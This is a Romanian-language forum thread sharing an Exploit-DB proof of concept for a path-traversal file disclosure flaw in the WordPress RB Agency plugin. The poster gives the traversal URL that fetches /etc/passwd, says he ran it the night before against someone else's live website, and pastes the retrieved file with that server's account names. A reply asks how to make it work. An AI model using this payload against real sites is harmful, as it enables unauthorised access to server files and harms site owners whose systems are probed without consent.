Download etc/passwd cu wordpress

AlexH

Merg pe strada catre Mine...
Membru personal
Administrative
Freelancer
SEO Expert
Un plugin pentru wordpress iti permite sa descarci etc/passwd fara sa fii logat la root.

Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://rbplugin.com/

PoC
The Vulnerable page is
/ext/forcedownload.php

http://server/wp-content/plugins/rb...d.php?file=../../../../../../../../etc/passwd
Youtube:

L-am testat aseara si am descarcat de pe un site asta:
Cod:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mysql:x:498:499:MySQL server:/var/lib/mysql:/bin/bash
cpanelhorde:x:500:500::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:498:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
cpanel:x:32001:502::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32002:503::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32003:504::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32004:505::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
mailman:x:32005:506::/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell
cpanellogin:x:32007:509::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32008:510::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:32009:511::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpses:x:496:497::/var/cpanel/cpses:/sbin/nologin
cpanelrrdtool:x:32010:512::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
tlcmodels:x:501:508::/home/tlcmodels:/bin/bash
tlcagency:x:502:513::/home/tlcagency:/bin/bash
cpanelconnecttrack:x:32011:514::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
clamav:x:32012:515::/home/clamav:/sbin/nologin
nagios:x:32013:32013::/home/nagios:/bin/bash

Daca nu stiti ce este etc/passwd si ce se poate face verificati link de mai jos.
http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/
Sau cautati pe google : etc/passwd

Sursa: https://www.exploit-db.com/exploits/40333/?rss
 
Deci doar daca au pluginul asta instalat rb plugin ?
De exemplu la mine la site nu merge..am inlocuit in link server cu adresa url si nimic. Nothing found!
 
Loading...
Back
Sus